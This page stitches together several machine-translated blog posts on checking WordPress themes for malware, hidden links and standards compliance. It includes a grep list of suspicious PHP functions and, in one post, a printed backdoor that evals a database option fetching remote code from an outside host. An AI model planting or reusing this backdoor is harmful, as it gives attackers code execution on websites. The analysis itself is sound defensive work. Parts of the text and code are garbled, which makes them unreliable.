Check the template for malicious code. How to change a WordPress template to suit yourself: checking the template layout according to SEO rules

22.08.2023

Download free Kaspersky antivirus - Kaspersky FREE

When activating the iPhone, it says SIM card is invalid. Iphone sim card is not supported.

What is VDS? VPS - what is it? Rating of the best VPS servers for Forex. Free VPS servers Choosing vps hosting

How was steel tempered or where do tanks come from in WoT?

WordPress is the most popular engine for creating various information websites and blogs. The security of your website is more than the security of your data. This is much more important, because it is also the safety of all users who read and trust your resource. This is why it is so important that the site is not infected with viruses or any other malicious code.

We will look at how to protect WordPress from hacking in one of the following articles, but now I want to tell you how to check a WordPress website for viruses and malicious code to make sure that everything is safe.

The very first option that comes to mind is that you were hacked by hackers and built their backdoors into the code of your site in order to be able to send spam, put links and other bad things. This happens sometimes, but this is a fairly rare case if you update the software on time.

There are thousands of free WordPress themes and various plugins, and this could already be a threat. It’s one thing when you download a template from the WordPress site and quite another when you find it on the left site. Unscrupulous developers can embed various malicious codes into their products. The risk is even greater if you download premium templates for free, where hackers, without risking anything, can add some kind of security hole through which they can then penetrate and do what they need. This is why checking a WordPress site for viruses is so important.

Checking a WordPress site for viruses

The first thing you need to turn to when checking a site is not viruses, these are WordPress plugins. Quickly and easily, you can scan your site and find suspicious areas of code that are worth paying attention to, whether they are in the theme, plugin, or core Wodpress itself. Let's look at a few of the most popular plugins:

1.TOC

This very simple plugin checks all themes installed on your site to see if they contain malicious code. The plugin detects hidden links encrypted using base64 code insertion, and also displays detailed information about the problems found. Most often, the pieces of code found are not viruses, but they can potentially be dangerous, so you should pay attention to them.

Open "Appearance" -> "TAC" then wait until all topics are checked.

2. VIP Scanner

Very similar to TOC topic scanner, but displays more detailed information. The same capabilities for detecting links, hidden code and other malicious inserts. Just open the VIP Scanner item in the tools section and analyze the result.

It may be enough to delete unnecessary files, for example, desktop.ini. Or you need to look in more detail at what happens in files using base64.

3. Anti-Malware from GOTMLS.NET

This plugin allows you not only to scan the themes and core of the site for viruses, but also to protect the site from brute force passwords and various XSS, SQLInj attacks. The search is performed based on known signatures and vulnerabilities. Some vulnerabilities can be fixed on site. To start scanning files, open "Anti-Malvare" in the side menu and click "Run Scan":

Before you can run a scan, you need to update your signature databases.

4. Wordfence

This is one of the most popular plugins for WordPress security and malware scanning. In addition to the scanner, which can find most bookmarks in the WordPress code, there is constant protection against various types of attacks and password brute force. During the search, the plugin finds possible problems with various plugins and themes and reports the need to update WordPress.

Open the tab "WPDefence" in the side menu and then go to the tab "Scan" and press "Start Scan":

The scan may take some time, but when completed, you will see a detailed report of the problems found.

5. AntiVirus

This is another simple plugin that will scan your website template for malicious code. The disadvantage is that only the current template is scanned, but the information is displayed in sufficient detail. You will see all the dangerous functions that are in the theme and then you can analyze in detail whether they pose any danger. Find an item "AntiVirus" in settings and then click "Scan the theme templates now":

6. Integrity Checker

It is also advisable to check the integrity of WordPress files, in case the virus has already written somewhere. To do this, you can use the Integrity Checker plugin. It checks all core, plugin and template files for changes. At the end of the scan, you will see information about the changed files.

Online services

There are also several online services that allow you to check a WordPress site for viruses or check just the template. Here are some of them:

themecheck.org- you download the theme archive and can see all the warnings about possible malicious functions that are used in it. You can not only view information about your theme, but also about other themes uploaded by other users, as well as different versions of the theme. Whatever the plugins find can be found by this site. Checking your WordPress theme is also very important.

virustotal.com- a well-known resource where you can check your website or template file for viruses.

ReScan.pro- scanning a WordPress site for viruses using this service is free; static and dynamic analysis is performed to detect possible redirects; the scanner opens the site pages. Checks the site against various blacklists.

sitecheck.sucuri.net- a simple service for scanning sites and topics for viruses. There is a plugin for WordPress. Detects dangerous links and scripts.

Manual check

Nothing can be better than manual checking. Linux has this wonderful grep utility that allows you to search for occurrences of arbitrary strings in a folder with files. It remains to understand what we will be looking for:

eval - this function allows you to execute arbitrary PHP code, it is not used by self-respecting products; if one of the plugins or a theme uses this function, there is almost a 100% probability that it contains a virus;

base64_decode- encryption functions can be used in conjunction with eval to hide malicious code, but they can also be used for peaceful purposes, so be careful;
sha1- another method of encrypting malicious code;
gzinflate- compression function, same goals, together with eval, for example, gzinflate(base64_decode(code);
strrev- turns the line backwards not before, as an option can be used for primitive encryption;
print- outputs information to the browser, together with gzinflate or base64_decode it is dangerous;
file_put_contents- WordPress itself or plugins can still create files in the file system, but if the theme does this, then you should be wary and check why it does this, as viruses can be installed;
file_get_contents- in most cases used for peaceful purposes, but can be used to download malicious code or read information from files;
curl- the same story;
fopen- opens a file for writing, you never know for what purpose;
system- the function executes a command on a Linux system, if a theme, plugin or wordpress itself does this, most likely there is a virus there;
symlink- creates symbolic links in the system, perhaps the virus is trying to make the main file system accessible from the outside;
copy- copies a file from one place to another;
getcwd- returns the name of the current working directory;
cwd- changes the current working folder;
ini_get- receives information about PHP settings, often for peaceful purposes, but you never know;
error_reporting(0)- disables the output of any error messages;
window.top.location.href- javascript function used for redirects to other pages;
hacked- so, just in case, we check, suddenly, the hacker himself decided to tell us.

You can substitute each individual word into a command like this:

grep -R "hacked" /var/www/path/to/files/wordpress/wp-content/

Or use a simple script that will search for all words at once:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copy(
eval(
system(
symlink(
error_reporting(0)
print
file_get_contents(
file_put_contents(
fopen(
hacked"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Hello, dear readers of the blog site. Nowadays there are few webmasters who design their website themselves (using pure Html, their own engine, or at least using self-created templates for the CMS). In general, this is true, because not everyone is able to create something worthwhile - this requires the talent of a designer. Most often it turns out to be at least “not very good”, and sometimes “simply terrible”.

That is why templates or design themes (in different engines, “skins” can be referred to by different terms) for popular CMS have become so widespread. Especially a lot of this goodness can be found on the Internet for Joomla and WordPress, because this is rightfully so, both in RuNet and in the bourgeois internet.

Actually, there are already quite a lot of Russian-language resources with catalogs of ready-made templates. Well, in the bourgeoisie there’s no way to count them. Everything seems so wonderful - install the engine, find a suitable template (it’s no secret that paid templates are not so difficult to find for free), download it and enjoy the professional design of your new website. All that remains is to add valuable content to it and you will be able to watch the popularity of your resource grow on the Internet.

But not everything is so simple and obvious. When I wrote an article a long time ago, I received quite regularly from readers by mail recommendations to remove this or that service from the list, because in those posted there hidden links or even viruses are found in templates. It turns out that the proverb is true - free cheese can only be found in a mousetrap. Developers of free templates (or those who “zero” paid ones) simply make money this way and, judging by the scope, a lot of it.

Hidden links to third-party (and often blacklisted by search engines) resources, and even more so viruses, can kill all hopes of promoting your resource (or seriously undermine them and spoil your nerves). For this you can, either. How can you protect yourself from all this when choosing a template?

What's wrong with free templates for Joomla and WordPress?

From my own experience I can say that it is very difficult for an “amateur” to compete with a “professional”. At the very beginning of this publication, I provided a link to an article about viruses that infected most of my sites. This happened more than two years ago, and during this time I have repeated the epic struggle for “code purity” more than once, but relapses still occur with enviable regularity on a number of infected resources (either spam is sent from them, or a doorway is formed, then something completely incomprehensible to me is happening, leading to a monstrously large load on the hosting).

At the same time, I use all the methods available to a “noob” to search for shells and other backdoors in the code of these sites, but again, I repeat that an amateur simply cannot compete with a pro. Therefore, if you think that you can easily remove a virus that has sneaked through a template, then most likely you are mistaken. This is a very dreary, terribly annoying matter (when viral activity, despite all your efforts, appears again and again) and takes a lot of time and effort.

The same also applies to hidden links. It’s good if you come across an option for introducing them from a past era, when you could simply find the place to insert them and get rid of them forever, ultimately getting a clean and free template. In most cases, everything is much more complicated. To find where to insert hidden links you will need software (for example, the TAC plugin), but it is not omnipotent, because the business of distributing links through free and paid (hacked) templates for Joomla and WordPress brings in very good income, which encourages people practicing it to search new solutions that make their “bookmark” less noticeable.

Actually, today it can be quite difficult to even quickly check a template for generating “left links”. For example, you downloaded a template, placed it on the site, added content and decided to see if any suspicious external links (not put in by you) appeared from it. There is none of them. You are happy, forget about this problem, are busy filling the site and promoting it, and then suddenly you accidentally discover (on your own or after a signal from search engines in the form of a filter or ban) that there are still hidden links and they lead to such “muck”, which you yourself would never even think of referring to.

The most offensive thing about this is that to remove the filter and “whiten” the site in the eyes of search engines It can take a very long time (months and even years in some cases). But the point here is that the developers of such “bookmarks” are aware that you know about them and check the site after installing the template for “all sorts of bad excesses.” Therefore, they slow down the start of generating these very links for some time, sufficient in their opinion for even the most suspicious user to believe in the purity of the template he received for free.

Moreover, hidden links are now encoded in such a way that they are not searched using the words md5 or base64 (often they are loaded from an external source). Just a set of letters and special characters that cannot be found by searching through all template files. And there may be more than one hundred of these files. Plus, links do not appear immediately. That is, there is virtually no way for a webmaster (the average) to detect them at the stage of website creation.

Well, to avoid infection through the template, I I prefer to pay money so as not to have to deal with a bunch of problems later. Another thing is that you can pay a lot of money, or you can pay not very much. I personally choose the second option, but first I’ll explain the essence of the first.

Something, of course, can be found and in the official repositories of these engines(read about that and go to the official website of extensions for Joomla), but, firstly, the choice there is significantly limited, and secondly, many thousands more sites around the world will be dressed in the same “clothes”, which somewhat reduces the uniqueness of your project both in the eyes of visitors and in the eyes of search engines.

However, there are many professional companies in the world that develop paid templates for Joomla and WordPress. A priori (), they should not have bookmarks, otherwise they will instantly lose the authority and trust of clients. However, the price for one template can be 50-100 dollars, depending on its functionality and novelty.

In addition, some problems with payment may arise (you will have to either take a risk and make a purchase with payment directly from a plastic card). However, as a result you will receive a deliberately “clean” template, which is good. True, the technical support that comes with it will be relevant only if you know the language in which it is provided. In most cases, knowledge of the Russian language will not help you in this matter.

I like the second option better due to its higher profitability (the ratio of money spent to opportunities received), although in relation to developers it is not entirely “white-washed”. Its essence is that Joomla and WordPress distributed under a GNU/GPL license, i.e. licenses for free software (such software can be used, copied, modified and distributed). Actually, I already wrote about this before in the article about Joomla templates mentioned at the very beginning.

Without going into too much detail, the point is that extensions (templates, plugins, etc.) for these engines cannot be the private property of the authors. Yes, you can demand payment for them, but it will no longer be possible to punish or prosecute for unauthorized use or distribution of these extensions. Despite this, the market for paid extensions for Joomla and WordPress is huge, although not protected by copyright law. On the contrary, the GNU/GPL license 100% protects you from the developer.

Many development companies, by the way, provide access to their templates by subscription. Those. you pay a certain amount and for a certain time you can download and continue to use all their creations (templates or extensions) on an ongoing basis. Actually, the second way to safely obtain themes for WordPress, as well as templates for Joomla, is based on approximately the same principle.

Not long ago, my friend, whom I mentioned in a number of articles, “pointed his finger at him” (he has been looking for the ideal option for building an online store for several years now, and along this path he finds a lot of things that seem interesting to me and are actively used in the future) . We are talking about pooling premium templates and extensions CmsHeaven.org .

The essence of the fundraiser is quite simple - buy a product and distribute it to everyone who participated in the fundraiser. CmsHeaven.org has simplified the scheme even more - there is no need to shell out for individual templates or extensions that you need. You simply pay for temporary access to the entire catalog that this service has at its disposal (several thousand titles, divided for ease of search by engines, authors and topics).

Each of the presented products was honestly purchased from the developers with the money of the depositors (there are also free templates, but again they are presented by well-known brands that they need for advertising purposes). And what is important, the organizers are constantly updating the catalog with new copies (in the heat of the moment, as they say), which will have to wait for a long time in the public. Many people will like this.

In general, this is a cooperative where you can join and enjoy all the benefits. But with some restrictions. The fact is that the organizers are well aware that without introducing restrictions, their entire catalog will be leaked to the public in a time or two. Therefore it takes place limit to 36 downloads per month. This is quite enough for an ordinary webmaster, and even a website creation company.

This guarantees absence in the presented extensions and templates "bookmarks"(hidden links, viruses, Trojans and snitches that inform the developer about the site using their template). In view of this, only products from well-known brands with open source are purchased, where all this can be checked and, if necessary, eliminated.

Some of the extensions have been translated into Russian, and if problems arise with installation or configuration, which is often very necessary (you’ve probably combed the Internet more than once in search of a solution to a problem that arose out of the blue). By the way, this is what distinguishes free engines from paid ones, that there is no user support as such.

And you will be able to download the products you like at normal speed and without viewing advertisements on file hosting services. It’s a trifle, because to get the coveted “cute” you can move mountains, and not just fight with a file hosting service, but it’s the trifles that make up comfort.

In general, I really liked the idea and its implementation, but should I use free templates from the Joomla and WordPress repositories, should I join in on CmsHeaven.org or buy templates directly from the developers? you'll have to decide for yourself. Just “I beg you, don’t eat raw tomatoes at night,” that is, don’t download free products from any “wonderful” resources, because you can end up with a lot of problems. Do you need it?

Good luck to you! See you soon on the pages of the blog site

Service for checking WordPress themes and Joomla templates for compliance with standards

ThemeCheck.org is a free service that allows you to check the safety and quality of templates for CMS WordPress and Joomla before installing them on your website.

To check a theme, download its archive from your computer by clicking the “Select file” button on themecheck.org. If you do not want the scan results to be saved on the service and available to other users, check the “ Forget uploaded data after results“. Now click the “Submit” button.

For example, I took the topic Interface, which I downloaded from the official website. 99 out of 100 – 0 critical errors and 1 warning. This is a very good result.

In comparison, my blog template received a score of 0 (14 errors and 23 warnings). I think that for many the results will not be much different, especially if the topics are already outdated. All notes with explanations, indicating the files and lines where they were found are located on the same page below.

Frankly, I didn’t understand much there; it would be more useful for authors, and it’s easier for me to change the template than to fix everything. I just don’t know when I’ll decide to do this.

On Home there is a large selection of previously tested WordPress and Joomla web themes with the ability to sort by time added or rating. When you click on them, you can see detailed information and links to the author’s website and download page.

If you are a developer and your theme is 100% valid, you can inform users about this by installing a special badge with a rating on it.

The value of ThemeCheck.org service is that any webmaster can use it to select a high-quality theme before installing it on the blog.

Theme Check plugin

You can check an already installed template for compatibility with the latest WordPress standards using the Theme Check plugin. Link to download the latest version: https://wordpress.org/plugins/theme-check/

The functionality of the plugin is similar to the service I described above. There is no need to make any settings after standard installation and activation. Check procedure:

Go to the admin panel to the menu page “Appearance” – “Theme Check”.
Select the desired theme from the drop-down list if you have several installed.
Check the “Suppress INFO” checkbox if you do not want to send information.
Click the “Check it“ button.

The results will be shown on the same page.

As you can see, the standard theme Twenty Ten It’s also not ideal, but, for example, Twenty Fourteen has no errors.

After checking, the plugin can be disabled, or better yet, removed completely until next time.

Conclusion. Before installing a new WordPress template, check it not only for hidden links and malicious code with the TAC plugin, but also with ThemeCheck.org service or Theme Check plugin for compliance with the latest CMS standards.

P.S. Recently, while browsing TopSape Reader, I saw a new SEO blog zenpr.ru, which holds 1st place among bloggers in terms of clicks per month. Considering that he is just over a month old, the result is worthy of respect. The design is in the style of minimalism, if not to say that it does not exist at all, but the author writes - you will read it. All to the point and without water. Just like in the blog title – “zero extra characters.” I recommend reading it, you will find a lot of useful information.

Hello friends. Are you sure that the free WordPress template you use for your websites and blogs is truly safe and does not contain hidden threats or malicious code? Are you completely sure about this? Absolutely?)

You think you ran the template through , removed hidden links from it, and the job is done. You periodically scan the site’s files with an antivirus, look into the Yandex webmaster tools in the Security tab and are relieved to see the message there: “ No malicious code was detected on the site«.

That's what I thought too. I wouldn't like to upset you, but...

Hidden Dangerous Code in Free WordPress Templates

This is the letter I received last week by email from my hosting company. Recently, they have introduced a regular check of all site files to look for malicious content, and they did find this content on me!

It all started when I went to my website one afternoon and couldn’t launch it—an abusive message popped up about files with the php extension not being found. Having tensed a little, I went to study the contents of the folder with the site on the hosting and immediately discovered a problem - my template file fuctions.php was renamed to functions.php.malware, which seemed to ambiguously hint - an antivirus was working here or something like that) Having gone to the mail, I and found the above report from the hoster.

The first thing I did, of course, was start checking this file, studying its contents, scanning it with all kinds of antiviruses, dozens of online virus checking services, etc. — in the end, nothing was found, everyone unanimously asserted that the file was completely safe. Of course, I expressed my doubts to the hoster, saying that you had messed something up, but just in case, I asked them to provide a report on the detection of a malicious piece of code.

And this is what they answered me

I went to google information about this code and thought seriously...

How to find a piece of malicious code in a template

As it turns out, this is a truly non-trivial technique that allows interested parties to transmit data to your site and change the contents of pages without your knowledge! If you are using a free template, then I highly recommend checking your functions.php for the following code:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
return $co;
) else return $content;
}

Even with my very shallow knowledge of PHP, it is clear that a certain filter is being created, tied to the global variable post and content, which are responsible for displaying content only on blog post pages (the is_single condition). Already suspicious isn't it? Well, now let’s see what this code is going to display on our website.

The interesting option blogoption requested in the database also looks very suspicious. We go into our MySQL database and find a table there called wp_options, if you did not change the prefixes then it will look like this by default. And in it we find the line that interests us called blogoption

What a beauty! We see the following option

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Those. From a certain site (and a Russian one, mind you) they are returning content that can contain anything! Any number of links, malicious codes, altered text, etc. When you access the site itself, it gives you a 403 access error, which is not surprising. Of course, I also removed this option from the database.

According to information from victims, the exact content of your article is usually returned with only one modification - instead of any dot “.” an open link was hidden in the text! And by the way, this option is written to the database when the template itself is installed, and then the code that does this successfully self-destructs. And I lived with such rubbish for two years, and not a single antivirus or service identified this threat to me in all that time. To be honest, I didn’t notice if this trick ever worked for me, or if my security plugin blocked this feature (or maybe one of the WordPress updates closed this hole), but it’s still unpleasant.

Moral about free cheese

How do you like the sophistication of our “translators” of templates (or those who post them in their catalogs)? This is not for you to cut out links from the footer) It’s a pity I don’t remember where I downloaded my template from, it was a long time ago, otherwise I would definitely have written a couple of affectionate ones. And if at that time I had the same experience that I have now, I definitely would not have used a free template, or, in extreme cases, would not have downloaded it from unknown sources!

It’s easier to buy some official premium template for 15-20 bucks and live in peace, knowing that there are no holes or encrypted links in it, and even if there are vulnerabilities, the developers will definitely release an update in which these holes will be closed. ( By the way, Artem recently published an article where he talks about premium templates and even gives out promotional codes for brutal discounts for those who are interested)

Hello IdeaFox friends!

I don’t know about you, but I have trouble sleeping at night. I am tormented by blog security issues. I have no strength anymore :-)

I read a bunch of blogs on this topic and tested many plugins that help solve this problem. And in the comments they began to ask questions about the topic of site protection, which prompted me to write this note.

Just imagine that you keep a blog, write articles, try... And evil assholes come and break your site. I think there will be a lot of grief.

After all, every normal blogger invests a lot of time and effort into the development of his website. And for many, blogging generally becomes an obsession... Here and until, if THIS happens :-)

Well, you understand how important this is.

Let's finally get down to business :)

A couple of months ago I already wrote a note about hacking. Be sure to read it. But quite a lot of time has passed since then and I took additional measures to strengthen the all-round defense.

In the following notes I will definitely dwell on this issue in detail. (I also remember and write about ISP settings)

3. Check the site on other online services

There are no shortage of such services. I have a strong opinion that many of them are completely stupid and created solely for displaying advertising.

Doctor Web

The company DR.Web has made a good service for checking sites online. Personally, he once helped me find an infection on a friend’s blog (There was third-party code in the .htaccess file)

The check is very simple. Enter your URL and wait for the verification result.

antivirus-alarm.ru

A powerful website scanner that uses as many as 43 antivirus databases from the world's leading antivirus companies.

Everything is very simple here too. We enter the URL of our site and wait with bated breath for the scan results.

I've been waiting for these.

Everything is clean, you can sleep peacefully :-)

All this is good, of course, but you also need to install a couple of plugins that won’t hurt at all for WordPress blogs.

4. Ask your host to check your site

The fact is that hosters are even more concerned about security issues than you and have powerful security measures. Moreover, with specialized means of protection.

This is the news I have for you today. Next, I will tell you about a very powerful plugin that can significantly protect your WordPress blog from hacking.

I have already been working with him for 2 months and am very pleased with him. While I figured it out, I banned myself 3 times: –) In short, there is something to tell.